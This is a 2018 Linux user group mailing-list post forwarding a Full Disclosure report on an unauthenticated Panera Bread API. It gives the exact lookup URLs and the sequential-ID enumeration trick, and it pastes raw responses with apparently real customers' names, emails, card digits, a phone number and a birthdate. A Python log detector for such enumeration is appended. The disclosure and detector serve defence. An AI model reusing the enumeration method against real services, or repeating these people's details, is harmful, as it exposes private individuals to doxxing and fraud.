Michael Lazin on 3 Apr 2018 11:15:12 -0700



[PLUG] Fwd: [FD] Massive Breach in Panera Bread


I realize this is from another listserv, but I thought this would be of interest to PLUG users because of the popularity of Panera for its open wifi.  It seems that data breaches are the new norm.  I recall a friend of mine saying that cracking is like shooting fish in a barrel; the hard part is building bulletproof fish.


---------- Forwarded message ----------
From: Jack Beanstalk <pnrabrdthrwy@gmail.com>
Date: Mon, Apr 2, 2018 at 3:43 PM
Subject: [FD] Massive Breach in Panera Bread
To: fulldisclosure@seclists.org


7682200f0cd27a4f1a3c2301941d959aae7abf89136c38a4f1ded4d2bb7a67d7

I'd like to report a security vulnerability in Panera Bread's web
application. There is a publicly available, completely unauthenticated
API endpoint that allows anyone to access the following information
about anyone who has ever signed up for an account to order food from
Panera Bread:

1. Username

2. First and last name

3. Email address

4. Phone number

5. Birthday

6. Last four digits of saved credit card number

7. Saved home address

8. Social account integration information

9. Saved user food preferences and dietary restrictions

Here are the API endpoints which you can use to verify this information:

1. https://delivery.panerabread.com/foundation-api/users/by-phone/9140000000

This returns the following JSON:

{"accounts": [
{"username":"denys","name":"romona ruiz","cardNumber":"********6515"},
{"username":"mhmulcahy@hotmail.com","name":"Marie Mulcahy","cardNumber":"********5527"},
{"username":"fenrny@msn.com","name":"F B","cardNumber":"********7921"},
{"username":"sabooky1@yahoo.com","name":"C Davis","cardNumber":"********7108"},
{"username":"jorgeialcalde","name":"Jorge Alcalde","cardNumber":"********6129"},
{"username":"ktennister37@aol.com","name":"Kei Kino","cardNumber":"********6061"},
{"username":"gettingbetter812@yahoo.com","name":"jan jones","cardNumber":"********8950"},
{"username":"kennny","name":"kenny poteat","cardNumber":"********4412"},
{"username":"angelo151","name":"angelo ianello","cardNumber":"********8386"},
{"username":"dblaperch@aol.com","name":"Deborah LaPerch","cardNumber":"********5384"},
{"username":"bagnoni1@optonline.net","name":"sadie bagnoni","cardNumber":"********5144"},
{"username":"arsbreva@hotmail.com","name":"Marea needle","cardNumber":"********7488"},
{"username":"contessa1234","name":"CONTESSA SLEDGE","cardNumber":"********6702"},
{"username":"lindapam","name":"elizabeth forlenzo","cardNumber":"********7085"},
{"username":"jue-95@hotmail.com","name":"juline G","cardNumber":"********4220"},
{"username":"gleuanter","name":"Leo Zinder","cardNumber":"********9123"},
{"username":"artlaura","name":"arthur hanson","cardNumber":"********8139"},
{"username":"dlongua","name":"denise longua","cardNumber":"********0102"},
{"username":"homestead19-86@msn.com","name":"Sandra Baglione","cardNumber":"********6851"},
{"username":"kilsha22","name":"kicia fulchek","cardNumber":"********2654"}
]}

Note that you can look up usernames/email addresses for Panera Bread
accounts if you know the target's phone number. This returns the
username/email address and last four digits of the saved credit card
of every user who has ever signed up with that phone number.

2. https://delivery.panerabread.com/foundation-api/users/uramp/7382194

This returns the following JSON:

{"customerId":7382194,
"username":"abcascio@cox.net","firstName":"Anthony","lastName":"Cascio",
"loyalty":{"cardNumber":"603077990852"},
"emails":[{"id":23860763,"emailAddress":"abcascio@cox.net","emailType":"Personal","isDefault":true,"isOpt":true,"isVerified":true}],
"phones":[{"id":18295989,"phoneNumber":"7032662951","phoneType":"Residential","countryCode":"1","extension":null,"name":null,"isSmsOpt":false,"isCallOpt":false,"isDefault":true,"isValid":true,"smsPreferences":[{"programName":"Delivery","isOpt":false,"isOptPending":false}]}],
"isSmsGlobalOpt":false,"isEmailGlobalOpt":true,"isMobilePushOpt":false,
"birthDate":{"birthDay":"25","birthMonth":"05","birthYear":"1948"},
"userPreferences":{"foodPreferences":[{"code":3,"displayName":"Low Fat"}],"gatherPreference":{"code":7,"displayName":"Meal with family"}},
"subscriptions":{"subscriptions":[{"subscriptionCode":1,"displayName":"Reward Reminders & Expiration Alerts","isSubscribed":false,"tncVersion":null},{"subscriptionCode":2,"displayName":"Panera Bread Updates & Special Offers","isSubscribed":false,"tncVersion":null}],"suppressors":[{"suppressionCode":1,"displayName":"Catering","isSuppressed":false},{"suppressionCode":2,"displayName":"CPG","isSuppressed":false}]},
"addresses":[],
"paymentOptions":{"creditCards":[],"payPals":[],"giftCards":[],"corporateCateringAccounts":[]},
"taxExemptions":null,"socialIntegration":null,"favoriteCafes":[]}

In this context, "7382194" is the user's account ID. Panera Bread uses
sequential integers for account IDs, which means that if your goal is
to gather as much information as you can instead about someone, you
can simply increment through the accounts and collect as much as you'd
like, up to and including the entire database.

Hopefully they'll fix this if it gets enough attention.

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/



--
Michael Lazin

to gar auto estin noein te kai ennai
___________________________________________________________________________
Philadelphia Linux Users Group         --        http://www.phillylinux.org
Announcements - http://lists.phillylinux.org/mailman/listinfo/plug-announce
General Discussion  --   http://lists.phillylinux.org/mailman/listinfo/plug
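Added example, not part of either message above: a small Python detector that flags the sequential account-id walk the forwarded post describes (incrementing through /foundation-api/users/uramp/<id>) in web-server access logs. The log format, client IPs and account ids below are constructed for illustration.

```python
import re
from collections import defaultdict

# Constructed sample access-log lines (simplified Apache combined format).
# The paths mirror the two endpoints named in the disclosure; the IPs,
# account ids and phone number are made up for this example.
SAMPLE_LOG = """\
203.0.113.7 - - [03/Apr/2018:10:00:01 -0700] "GET /foundation-api/users/uramp/4100201 HTTP/1.1" 200 1422
203.0.113.7 - - [03/Apr/2018:10:00:01 -0700] "GET /foundation-api/users/uramp/4100202 HTTP/1.1" 200 1380
203.0.113.7 - - [03/Apr/2018:10:00:02 -0700] "GET /foundation-api/users/uramp/4100203 HTTP/1.1" 200 1401
203.0.113.7 - - [03/Apr/2018:10:00:02 -0700] "GET /foundation-api/users/uramp/4100204 HTTP/1.1" 200 1399
203.0.113.7 - - [03/Apr/2018:10:00:03 -0700] "GET /foundation-api/users/uramp/4100205 HTTP/1.1" 200 1410
198.51.100.4 - - [03/Apr/2018:10:00:05 -0700] "GET /foundation-api/users/uramp/1200345 HTTP/1.1" 200 1388
198.51.100.4 - - [03/Apr/2018:10:00:09 -0700] "GET /foundation-api/users/by-phone/9140000000 HTTP/1.1" 200 2210
"""

LINE_RE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "GET (/foundation-api/users/(uramp|by-phone)/(\d+)) ')

def parse(log_text):
    """Yield (client_ip, endpoint, numeric id) for each request to the user endpoints."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield m.group(1), m.group(3), int(m.group(4))

def longest_sequential_run(ids):
    """Length of the longest run of consecutive integers among the distinct ids."""
    best = run = 0
    prev = None
    for i in sorted(set(ids)):
        run = run + 1 if prev is not None and i == prev + 1 else 1
        best = max(best, run)
        prev = i
    return best

def find_enumerators(log_text, min_run=4):
    """Map client_ip -> run length for clients that walked >= min_run consecutive account ids."""
    per_client = defaultdict(list)
    for ip, endpoint, ident in parse(log_text):
        if endpoint == "uramp":          # the sequential-id endpoint from the post
            per_client[ip].append(ident)
    runs = {ip: longest_sequential_run(ids) for ip, ids in per_client.items()}
    return {ip: run for ip, run in runs.items() if run >= min_run}

if __name__ == "__main__":
    for ip, run in find_enumerators(SAMPLE_LOG).items():
        print(f"{ip} walked {run} consecutive account ids")
```

The same per-client grouping applied to the by-phone endpoint (counting distinct phone numbers rather than consecutive ids) covers the lookup-by-phone case from the post.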